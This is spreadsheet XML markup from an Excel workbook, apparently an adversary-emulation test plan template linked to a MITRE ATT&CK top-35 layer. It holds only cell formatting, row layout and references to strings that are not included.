    <cellStyle name="Hyperlink 1" xfId="1" xr:uid="{00000000-0005-0000-0000-000000000000}"/>
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="3">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4747"/>
      <color rgb="FFA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866588</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>171824</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>9</xdr:col>
      <xdr:colOff>767055</xdr:colOff>
      <xdr:row>23</xdr:row>
      <xdr:rowOff>156882</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="3" name="Picture 2">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BBF0C4C-B019-2488-AFEE-C9EE0AAA3A3F}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="7410823" y="171824"/>
          <a:ext cx="13190644" cy="85388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Sam0x90/CTI/blob/main/Adversary%20Emulation%20Plans/2022_Top35_Mitre/top35_navigator_layer.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zoomScale="65" zoomScaleNormal="70" workbookViewId="0">
      <selection activeCell="C13" sqref="C13:D13"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7265625" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="5.7265625" customWidth="1"/>
    <col min="2" max="4" width="29.26953125" customWidth="1"/>
    <col min="5" max="5" width="51.54296875" customWidth="1"/>
    <col min="6" max="8" width="36.453125" customWidth="1"/>
    <col min="9" max="9" width="29.26953125" style="2" customWidth="1"/>
    <col min="10" max="10" width="29.26953125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="2:10" ht="16" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B1" s="55" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="55"/>
      <c r="D1" s="30"/>
      <c r="E1" s="30"/>
      <c r="F1" s="30"/>
      <c r="G1" s="30"/>
      <c r="H1" s="30"/>
      <c r="I1" s="30"/>
      <c r="J1" s="30"/>
    </row>
    <row r="2" spans="2:10" ht="16" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B2" s="55"/>
      <c r="C2" s="55"/>
      <c r="F2" s="2"/>
      <c r="G2" s="2"/>
      <c r="H2" s="2"/>
      <c r="J2" s="2"/>
    </row>
    <row r="3" spans="2:10" ht="16" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B3" s="55"/>
      <c r="C3" s="55"/>
      <c r="F3" s="2"/>
      <c r="G3" s="2"/>
      <c r="H3" s="2"/>
      <c r="J3" s="2"/>
    </row>
    <row r="4" spans="2:10" x14ac:dyDescent="0.35">
      <c r="B4" t="s">
        <v>200</v>
      </c>
      <c r="C4" s="38" t="s">
        <v>201</v>
      </c>
      <c r="F4" s="2"/>
      <c r="G4" s="2"/>
      <c r="H4" s="2"/>
      <c r="J4" s="2"/>
    </row>
    <row r="5" spans="2:10" x14ac:dyDescent="0.35">
      <c r="B5" s="12" t="s">
        <v>1</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>2</v>
      </c>
      <c r="E5" s="2"/>
      <c r="F5" s="2"/>
      <c r="G5" s="2"/>
      <c r="H5" s="2"/>
      <c r="J5" s="2"/>
    </row>
    <row r="6" spans="2:10" ht="45.65" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B6" s="12" t="s">
        <v>3</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>199</v>
      </c>
      <c r="E6" s="2"/>
      <c r="F6" s="5"/>
      <c r="G6" s="5"/>
      <c r="H6" s="5"/>
      <c r="I6" s="5"/>
      <c r="J6" s="2"/>
    </row>
    <row r="7" spans="2:10" x14ac:dyDescent="0.35">
      <c r="B7" s="12" t="s">
        <v>4</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>5</v>
      </c>
      <c r="E7" s="2"/>
      <c r="F7" s="2"/>
      <c r="G7" s="2"/>
      <c r="H7" s="2"/>
      <c r="J7" s="2"/>
    </row>
    <row r="8" spans="2:10" ht="58" x14ac:dyDescent="0.35">
      <c r="B8" s="12" t="s">
        <v>6</v>
      </c>
      <c r="C8" s="5" t="s">
        <v>7</v>
      </c>
      <c r="E8" s="5"/>
      <c r="F8" s="2"/>
      <c r="G8" s="2"/>
      <c r="H8" s="2"/>
      <c r="J8" s="2"/>
    </row>
    <row r="9" spans="2:10" ht="71.150000000000006" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B9" s="12" t="s">
        <v>8</v>
      </c>
      <c r="C9" s="48" t="s">
        <v>9</v>
      </c>
      <c r="D9" s="48"/>
      <c r="E9" s="48"/>
      <c r="F9" s="12"/>
      <c r="G9" s="12"/>
      <c r="H9" s="12"/>
      <c r="I9" s="12"/>
      <c r="J9" s="12"/>
    </row>
    <row r="10" spans="2:10" ht="21" x14ac:dyDescent="0.35">
      <c r="B10" s="29" t="s">
        <v>10</v>
      </c>
      <c r="C10" s="29"/>
      <c r="D10" s="29"/>
      <c r="E10" s="29"/>
      <c r="F10" s="2"/>
      <c r="G10" s="2"/>
      <c r="H10" s="2"/>
      <c r="J10" s="2"/>
    </row>
    <row r="11" spans="2:10" x14ac:dyDescent="0.35">
      <c r="B11" s="12" t="s">
        <v>11</v>
      </c>
      <c r="C11" s="2" t="s">
        <v>202</v>
      </c>
      <c r="E11" s="2"/>
      <c r="F11" s="4"/>
      <c r="G11" s="4"/>
      <c r="H11" s="4"/>
      <c r="I11" s="4"/>
      <c r="J11" s="4"/>
    </row>
    <row r="12" spans="2:10" x14ac:dyDescent="0.35">
      <c r="B12" s="12" t="s">
        <v>12</v>
      </c>
      <c r="C12" s="11" t="s">
        <v>13</v>
      </c>
      <c r="E12" s="2"/>
    </row>
    <row r="13" spans="2:10" ht="68.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B13" s="12" t="s">
        <v>14</v>
      </c>
      <c r="C13" s="48" t="s">
        <v>15</v>
      </c>
      <c r="D13" s="48"/>
      <c r="E13" s="5"/>
    </row>
    <row r="14" spans="2:10" ht="68.150000000000006" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B14" s="12" t="s">
        <v>16</v>
      </c>
      <c r="C14" s="48" t="s">
        <v>163</v>
      </c>
      <c r="D14" s="48"/>
      <c r="E14" s="2"/>
    </row>
    <row r="15" spans="2:10" x14ac:dyDescent="0.35">
      <c r="B15" s="1" t="s">
        <v>17</v>
      </c>
      <c r="C15" s="12" t="s">
        <v>18</v>
      </c>
      <c r="E15" s="12"/>
    </row>
    <row r="16" spans="2:10" x14ac:dyDescent="0.35">
      <c r="B16" s="1" t="s">
        <v>19</v>
      </c>
      <c r="C16" s="2" t="s">
        <v>18</v>
      </c>
      <c r="E16" s="2"/>
    </row>
    <row r="17" spans="1:10" x14ac:dyDescent="0.35">
      <c r="B17" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C17" s="28" t="s">
        <v>21</v>
      </c>
      <c r="E17" s="4"/>
    </row>
    <row r="18" spans="1:10" x14ac:dyDescent="0.35">
      <c r="B18" s="2"/>
    </row>
    <row r="19" spans="1:10" x14ac:dyDescent="0.35">
      <c r="B19" s="2"/>
    </row>
    <row r="20" spans="1:10" ht="21" x14ac:dyDescent="0.35">
      <c r="B20" s="29" t="s">
        <v>159</v>
      </c>
      <c r="C20" s="37"/>
    </row>
    <row r="21" spans="1:10" ht="42" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B21" s="2"/>
      <c r="C21" s="48" t="s">
        <v>196</v>
      </c>
      <c r="D21" s="48"/>
    </row>
    <row r="22" spans="1:10" ht="42" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B22" s="2"/>
      <c r="C22" s="48"/>
      <c r="D22" s="48"/>
    </row>
    <row r="23" spans="1:10" ht="42" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B23" s="2"/>
      <c r="C23" s="48"/>
      <c r="D23" s="48"/>
    </row>
    <row r="24" spans="1:10" x14ac:dyDescent="0.35">
      <c r="B24" s="2"/>
    </row>
    <row r="25" spans="1:10" s="3" customFormat="1" ht="26" x14ac:dyDescent="0.5">
      <c r="A25" s="62" t="s">
        <v>22</v>
      </c>
      <c r="B25" s="62"/>
      <c r="C25" s="62"/>
      <c r="D25" s="62"/>
      <c r="E25" s="62"/>
      <c r="F25" s="62"/>
      <c r="G25" s="62"/>
      <c r="H25" s="62"/>
      <c r="I25" s="62"/>
      <c r="J25" s="62"/>
    </row>
    <row r="26" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A26" s="63" t="s">
        <v>23</v>
      </c>
      <c r="B26" s="64"/>
      <c r="C26" s="64"/>
      <c r="D26" s="6" t="s">
        <v>24</v>
      </c>
      <c r="E26" s="8" t="s">
        <v>25</v>
      </c>
      <c r="F26" s="7" t="s">
        <v>26</v>
      </c>
      <c r="G26" s="56" t="s">
        <v>27</v>
      </c>
      <c r="H26" s="56"/>
      <c r="I26" s="57"/>
      <c r="J26" s="9" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="27" spans="1:10" x14ac:dyDescent="0.35">
      <c r="A27" s="13" t="s">
        <v>29</v>
      </c>
      <c r="B27" s="10" t="s">
        <v>30</v>
      </c>
      <c r="C27" s="10" t="s">
        <v>31</v>
      </c>
      <c r="D27" s="10" t="s">
        <v>32</v>
      </c>
      <c r="E27" s="10" t="s">
        <v>33</v>
      </c>
      <c r="F27" s="10" t="s">
        <v>34</v>
      </c>
      <c r="G27" s="10" t="s">
        <v>35</v>
      </c>
      <c r="H27" s="10" t="s">
        <v>12</v>
      </c>
      <c r="I27" s="11" t="s">
        <v>36</v>
      </c>
      <c r="J27" s="10" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="28" spans="1:10" ht="68.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A28" s="49">
        <v>1</v>
      </c>
      <c r="B28" s="58" t="s">
        <v>38</v>
      </c>
      <c r="C28" s="59" t="s">
        <v>39</v>
      </c>
      <c r="D28" s="59" t="s">
        <v>39</v>
      </c>
      <c r="E28" s="59" t="s">
        <v>39</v>
      </c>
      <c r="F28" s="31" t="s">
        <v>40</v>
      </c>
      <c r="G28" s="31" t="s">
        <v>40</v>
      </c>
      <c r="H28" s="31" t="s">
        <v>40</v>
      </c>
      <c r="I28" s="31" t="s">
        <v>40</v>
      </c>
      <c r="J28" s="65" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="29" spans="1:10" ht="68.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A29" s="50"/>
      <c r="B29" s="53"/>
      <c r="C29" s="60"/>
      <c r="D29" s="60"/>
      <c r="E29" s="60"/>
      <c r="F29" s="32" t="s">
        <v>40</v>
      </c>
      <c r="G29" s="32" t="s">
        <v>40</v>
      </c>
      <c r="H29" s="32" t="s">
        <v>40</v>
      </c>
      <c r="I29" s="32" t="s">
        <v>40</v>
      </c>
      <c r="J29" s="66"/>
    </row>
    <row r="30" spans="1:10" ht="68.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A30" s="49">
        <v>2</v>
      </c>
      <c r="B30" s="58" t="s">
        <v>42</v>
      </c>
      <c r="C30" s="47" t="s">
        <v>43</v>
      </c>
      <c r="D30" s="59" t="s">
        <v>39</v>
      </c>
      <c r="E30" s="59" t="s">
        <v>39</v>
      </c>
      <c r="F30" s="31" t="s">
        <v>40</v>
      </c>
      <c r="G30" s="31" t="s">
        <v>40</v>
      </c>
      <c r="H30" s="31" t="s">
        <v>40</v>
      </c>
      <c r="I30" s="31" t="s">
        <v>40</v>
      </c>
      <c r="J30" s="39" t="s">
        <v>44</v>
      </c>
    </row>
    <row r="31" spans="1:10" ht="68.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A31" s="50"/>
      <c r="B31" s="53"/>
      <c r="C31" s="51"/>
      <c r="D31" s="60"/>
      <c r="E31" s="60"/>
      <c r="F31" s="32" t="s">
        <v>40</v>
      </c>
      <c r="G31" s="32" t="s">
        <v>40</v>
      </c>
      <c r="H31" s="32" t="s">
        <v>40</v>
      </c>
      <c r="I31" s="32" t="s">
        <v>40</v>
      </c>
      <c r="J31" s="40"/>
    </row>
    <row r="32" spans="1:10" ht="52" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A32" s="49">
        <v>3</v>
      </c>
      <c r="B32" s="58" t="s">
        <v>45</v>
      </c>
      <c r="C32" s="47" t="s">
        <v>46</v>
      </c>
      <c r="D32" s="47" t="s">
        <v>164</v>
      </c>
      <c r="E32" s="52" t="s">
        <v>165</v>
      </c>
      <c r="F32" s="17" t="s">
        <v>47</v>
      </c>
      <c r="G32" s="17" t="s">
        <v>48</v>
      </c>
      <c r="H32" s="18" t="s">
        <v>49</v>
      </c>
      <c r="I32" s="14" t="s">
        <v>50</v>
      </c>
      <c r="J32" s="39" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="33" spans="1:10" ht="52" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A33" s="54"/>
      <c r="B33" s="61"/>
      <c r="C33" s="48"/>
      <c r="D33" s="48"/>
      <c r="E33" s="48"/>
      <c r="F33" s="33" t="s">
        <v>162</v>
      </c>
      <c r="G33" s="33" t="s">
        <v>52</v>
      </c>
      <c r="H33" s="23" t="s">
        <v>53</v>
      </c>
      <c r="I33" s="5" t="s">
        <v>54</v>
      </c>
      <c r="J33" s="44"/>
    </row>
    <row r="34" spans="1:10" ht="52" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A34" s="50"/>
      <c r="B34" s="53"/>
      <c r="C34" s="51"/>
      <c r="D34" s="51"/>
      <c r="E34" s="51"/>
      <c r="F34" s="19" t="s">
        <v>55</v>
      </c>
      <c r="G34" s="19" t="s">
        <v>56</v>
      </c>
      <c r="H34" s="20" t="s">
        <v>49</v>
      </c>
      <c r="I34" s="15" t="s">
        <v>57</v>
      </c>
      <c r="J34" s="40"/>
    </row>
    <row r="35" spans="1:10" ht="75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A35" s="49">
        <v>4</v>
      </c>
      <c r="B35" s="58" t="s">
        <v>45</v>
      </c>
      <c r="C35" s="14" t="s">
        <v>46</v>
      </c>
      <c r="D35" s="47" t="s">
        <v>58</v>
      </c>
      <c r="E35" s="72" t="s">
        <v>166</v>
      </c>
      <c r="F35" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G35" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H35" s="18"/>
      <c r="I35" s="14"/>
      <c r="J35" s="70"/>
    </row>
    <row r="36" spans="1:10" ht="75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A36" s="50"/>
      <c r="B36" s="53"/>
      <c r="C36" s="15" t="s">
        <v>61</v>
      </c>
      <c r="D36" s="51"/>
      <c r="E36" s="67"/>
      <c r="F36" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G36" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H36" s="20"/>
      <c r="I36" s="15"/>
      <c r="J36" s="71"/>
    </row>
    <row r="37" spans="1:10" ht="74.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A37" s="49">
        <v>5</v>
      </c>
      <c r="B37" s="58" t="s">
        <v>45</v>
      </c>
      <c r="C37" s="14" t="s">
        <v>46</v>
      </c>
      <c r="D37" s="47" t="s">
        <v>62</v>
      </c>
      <c r="E37" s="73" t="s">
        <v>167</v>
      </c>
      <c r="F37" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G37" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H37" s="18"/>
      <c r="I37" s="14"/>
      <c r="J37" s="70"/>
    </row>
    <row r="38" spans="1:10" ht="74.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A38" s="50"/>
      <c r="B38" s="53"/>
      <c r="C38" s="15" t="s">
        <v>63</v>
      </c>
      <c r="D38" s="51"/>
      <c r="E38" s="74"/>
      <c r="F38" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G38" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H38" s="20"/>
      <c r="I38" s="15"/>
      <c r="J38" s="71"/>
    </row>
    <row r="39" spans="1:10" ht="75.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A39" s="49">
        <v>6</v>
      </c>
      <c r="B39" s="58" t="s">
        <v>45</v>
      </c>
      <c r="C39" s="14" t="s">
        <v>46</v>
      </c>
      <c r="D39" s="47" t="s">
        <v>64</v>
      </c>
      <c r="E39" s="72" t="s">
        <v>168</v>
      </c>
      <c r="F39" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G39" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H39" s="18"/>
      <c r="I39" s="14"/>
      <c r="J39" s="70"/>
    </row>
    <row r="40" spans="1:10" ht="75.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A40" s="50"/>
      <c r="B40" s="53"/>
      <c r="C40" s="15" t="s">
        <v>61</v>
      </c>
      <c r="D40" s="51"/>
      <c r="E40" s="67"/>
      <c r="F40" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G40" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H40" s="20"/>
      <c r="I40" s="15"/>
      <c r="J40" s="71"/>
    </row>
    <row r="41" spans="1:10" ht="58.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A41" s="49">
        <v>7</v>
      </c>
      <c r="B41" s="58" t="s">
        <v>45</v>
      </c>
      <c r="C41" s="47" t="s">
        <v>65</v>
      </c>
      <c r="D41" s="47" t="s">
        <v>66</v>
      </c>
      <c r="E41" s="52" t="s">
        <v>169</v>
      </c>
      <c r="F41" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G41" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H41" s="18"/>
      <c r="I41" s="14"/>
      <c r="J41" s="70"/>
    </row>
    <row r="42" spans="1:10" ht="58.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A42" s="50"/>
      <c r="B42" s="53"/>
      <c r="C42" s="51"/>
      <c r="D42" s="51"/>
      <c r="E42" s="51"/>
      <c r="F42" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G42" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H42" s="20"/>
      <c r="I42" s="15"/>
      <c r="J42" s="71"/>
    </row>
    <row r="43" spans="1:10" ht="52" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A43" s="49">
        <v>8</v>
      </c>
      <c r="B43" s="47" t="s">
        <v>67</v>
      </c>
      <c r="C43" s="47" t="s">
        <v>68</v>
      </c>
      <c r="D43" s="47" t="s">
        <v>69</v>
      </c>
      <c r="E43" s="41" t="s">
        <v>170</v>
      </c>
      <c r="F43" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G43" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H43" s="18"/>
      <c r="I43" s="14"/>
      <c r="J43" s="21"/>
    </row>
    <row r="44" spans="1:10" ht="52" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A44" s="50"/>
      <c r="B44" s="51"/>
      <c r="C44" s="51"/>
      <c r="D44" s="51"/>
      <c r="E44" s="43"/>
      <c r="F44" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G44" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H44" s="20"/>
      <c r="I44" s="15"/>
      <c r="J44" s="22"/>
    </row>
    <row r="45" spans="1:10" ht="60.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A45" s="49">
        <v>9</v>
      </c>
      <c r="B45" s="47" t="s">
        <v>67</v>
      </c>
      <c r="C45" s="47" t="s">
        <v>70</v>
      </c>
      <c r="D45" s="47" t="s">
        <v>71</v>
      </c>
      <c r="E45" s="72" t="s">
        <v>171</v>
      </c>
      <c r="F45" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G45" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H45" s="18"/>
      <c r="I45" s="14"/>
      <c r="J45" s="39" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="46" spans="1:10" ht="60.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A46" s="50"/>
      <c r="B46" s="51"/>
      <c r="C46" s="51"/>
      <c r="D46" s="51"/>
      <c r="E46" s="67"/>
      <c r="F46" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G46" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H46" s="20"/>
      <c r="I46" s="15"/>
      <c r="J46" s="40"/>
    </row>
    <row r="47" spans="1:10" ht="56" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A47" s="49">
        <v>10</v>
      </c>
      <c r="B47" s="14" t="s">
        <v>67</v>
      </c>
      <c r="C47" s="14" t="s">
        <v>70</v>
      </c>
      <c r="D47" s="47" t="s">
        <v>73</v>
      </c>
      <c r="E47" s="41" t="s">
        <v>172</v>
      </c>
      <c r="F47" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G47" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H47" s="18"/>
      <c r="I47" s="14"/>
      <c r="J47" s="21"/>
    </row>
    <row r="48" spans="1:10" ht="56" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A48" s="50"/>
      <c r="B48" s="15" t="s">
        <v>74</v>
      </c>
      <c r="C48" s="15" t="s">
        <v>75</v>
      </c>
      <c r="D48" s="51"/>
      <c r="E48" s="43"/>
      <c r="F48" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G48" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H48" s="20"/>
      <c r="I48" s="15"/>
      <c r="J48" s="22"/>
    </row>
    <row r="49" spans="1:10" ht="119" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A49" s="49">
        <v>11</v>
      </c>
      <c r="B49" s="14" t="s">
        <v>67</v>
      </c>
      <c r="C49" s="14" t="s">
        <v>70</v>
      </c>
      <c r="D49" s="47" t="s">
        <v>76</v>
      </c>
      <c r="E49" s="41" t="s">
        <v>173</v>
      </c>
      <c r="F49" s="16" t="s">
        <v>59</v>
      </c>
      <c r="G49" s="16" t="s">
        <v>60</v>
      </c>
      <c r="H49" s="35"/>
      <c r="I49" s="34"/>
      <c r="J49" s="21"/>
    </row>
    <row r="50" spans="1:10" ht="119" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A50" s="50"/>
      <c r="B50" s="15" t="s">
        <v>74</v>
      </c>
      <c r="C50" s="15" t="s">
        <v>77</v>
      </c>
      <c r="D50" s="51"/>
      <c r="E50" s="43"/>
      <c r="F50" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G50" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H50" s="20"/>
      <c r="I50" s="15"/>
      <c r="J50" s="22"/>
    </row>
    <row r="51" spans="1:10" ht="41" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A51" s="49">
        <v>12</v>
      </c>
      <c r="B51" s="14" t="s">
        <v>67</v>
      </c>
      <c r="C51" s="14" t="s">
        <v>78</v>
      </c>
      <c r="D51" s="47" t="s">
        <v>79</v>
      </c>
      <c r="E51" s="41" t="s">
        <v>177</v>
      </c>
      <c r="F51" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G51" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H51" s="18"/>
      <c r="I51" s="14"/>
      <c r="J51" s="21"/>
    </row>
    <row r="52" spans="1:10" ht="41" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A52" s="50"/>
      <c r="B52" s="15" t="s">
        <v>74</v>
      </c>
      <c r="C52" s="15" t="s">
        <v>80</v>
      </c>
      <c r="D52" s="51"/>
      <c r="E52" s="43"/>
      <c r="F52" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G52" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H52" s="20"/>
      <c r="I52" s="15"/>
      <c r="J52" s="22"/>
    </row>
    <row r="53" spans="1:10" ht="37.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A53" s="49">
        <v>13</v>
      </c>
      <c r="B53" s="14" t="s">
        <v>67</v>
      </c>
      <c r="C53" s="14" t="s">
        <v>78</v>
      </c>
      <c r="D53" s="47" t="s">
        <v>81</v>
      </c>
      <c r="E53" s="41" t="s">
        <v>176</v>
      </c>
      <c r="F53" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G53" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H53" s="18"/>
      <c r="I53" s="14"/>
      <c r="J53" s="21"/>
    </row>
    <row r="54" spans="1:10" ht="37.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A54" s="50"/>
      <c r="B54" s="15" t="s">
        <v>74</v>
      </c>
      <c r="C54" s="15" t="s">
        <v>82</v>
      </c>
      <c r="D54" s="51"/>
      <c r="E54" s="43"/>
      <c r="F54" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G54" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H54" s="20"/>
      <c r="I54" s="15"/>
      <c r="J54" s="22"/>
    </row>
    <row r="55" spans="1:10" ht="94" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A55" s="49">
        <v>14</v>
      </c>
      <c r="B55" s="14" t="s">
        <v>67</v>
      </c>
      <c r="C55" s="14" t="s">
        <v>78</v>
      </c>
      <c r="D55" s="47" t="s">
        <v>83</v>
      </c>
      <c r="E55" s="41" t="s">
        <v>174</v>
      </c>
      <c r="F55" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G55" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H55" s="18"/>
      <c r="I55" s="14"/>
      <c r="J55" s="21"/>
    </row>
    <row r="56" spans="1:10" ht="94" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A56" s="50"/>
      <c r="B56" s="15" t="s">
        <v>84</v>
      </c>
      <c r="C56" s="15" t="s">
        <v>85</v>
      </c>
      <c r="D56" s="51"/>
      <c r="E56" s="43"/>
      <c r="F56" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G56" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H56" s="20"/>
      <c r="I56" s="15"/>
      <c r="J56" s="22"/>
    </row>
    <row r="57" spans="1:10" ht="48" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A57" s="49">
        <v>15</v>
      </c>
      <c r="B57" s="14" t="s">
        <v>67</v>
      </c>
      <c r="C57" s="14" t="s">
        <v>78</v>
      </c>
      <c r="D57" s="47" t="s">
        <v>86</v>
      </c>
      <c r="E57" s="41" t="s">
        <v>175</v>
      </c>
      <c r="F57" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G57" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H57" s="18"/>
      <c r="I57" s="14"/>
      <c r="J57" s="21"/>
    </row>
    <row r="58" spans="1:10" ht="48" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A58" s="50"/>
      <c r="B58" s="15" t="s">
        <v>87</v>
      </c>
      <c r="C58" s="15" t="s">
        <v>88</v>
      </c>
      <c r="D58" s="51"/>
      <c r="E58" s="43"/>
      <c r="F58" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G58" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H58" s="20"/>
      <c r="I58" s="15"/>
      <c r="J58" s="22"/>
    </row>
    <row r="59" spans="1:10" ht="66" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A59" s="49">
        <v>16</v>
      </c>
      <c r="B59" s="47" t="s">
        <v>84</v>
      </c>
      <c r="C59" s="47" t="s">
        <v>89</v>
      </c>
      <c r="D59" s="47" t="s">
        <v>90</v>
      </c>
      <c r="E59" s="41" t="s">
        <v>178</v>
      </c>
      <c r="F59" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G59" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H59" s="18"/>
      <c r="I59" s="14"/>
      <c r="J59" s="21"/>
    </row>
    <row r="60" spans="1:10" ht="66" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A60" s="50"/>
      <c r="B60" s="51"/>
      <c r="C60" s="51"/>
      <c r="D60" s="51"/>
      <c r="E60" s="43"/>
      <c r="F60" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G60" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H60" s="20"/>
      <c r="I60" s="15"/>
      <c r="J60" s="22"/>
    </row>
    <row r="61" spans="1:10" ht="204.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A61" s="49">
        <v>17</v>
      </c>
      <c r="B61" s="47" t="s">
        <v>84</v>
      </c>
      <c r="C61" s="47" t="s">
        <v>91</v>
      </c>
      <c r="D61" s="47" t="s">
        <v>92</v>
      </c>
      <c r="E61" s="41" t="s">
        <v>197</v>
      </c>
      <c r="F61" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G61" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H61" s="18"/>
      <c r="I61" s="14"/>
      <c r="J61" s="21"/>
    </row>
    <row r="62" spans="1:10" ht="204.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A62" s="50"/>
      <c r="B62" s="51"/>
      <c r="C62" s="51"/>
      <c r="D62" s="51"/>
      <c r="E62" s="43"/>
      <c r="F62" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G62" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H62" s="20"/>
      <c r="I62" s="15"/>
      <c r="J62" s="22"/>
    </row>
